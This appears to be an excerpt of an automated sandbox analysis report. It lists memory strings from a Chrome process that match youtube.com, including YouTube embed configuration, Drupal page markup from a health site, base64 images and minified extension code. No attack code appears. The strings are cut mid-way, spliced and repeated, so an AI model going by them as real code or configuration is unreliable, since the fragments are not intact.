ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370397956.000028EC03559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false}EDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323428029.000028EC04BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/form/contact-us","https://twitter.com/FoHTHRIVE","https://www.facebook.com/FOHThrive","https://fountainofhealth.ca/en/home","https://www.youtube.com/@fountainofhealth2679","https://fountainofhealth.ca/fr/node/113","https://fountainofhealth.ca/en#main-content","https://fountainofhealth.ca/organizations","https://fountainofhealth.ca/individuals","https://fountainofhealth.ca/clinicians","https://fountainofhealth.ca/our-people-partners#world","https://fountainofhealth.ca/our-people-partners#teams",null,"https://fountainofhealth.ca/thrive/thoughts","https://fountainofhealth.ca/thrive/health-habits","https://fountainofhealth.ca/thrive/relationship","https://fountainofhealth.ca/thrive/interests","https://fountainofhealth.ca/thrive/valued-goals","https:/
                                  Source: chrome.exe, 00000000.00000003.2344000946.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}= [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323398475.000028EC04C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
                                  Source: chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323618407.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: ]Uchrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jschrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jsurrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}=(G=+(I=T%16+1,r()|0)*I-I*l- -5880*l+Z[w+11&7]*T*I- -3960*T*l+w+60*l*l+2*T*T*I-120*T*T*l,void 0),Z)[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ]Uhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
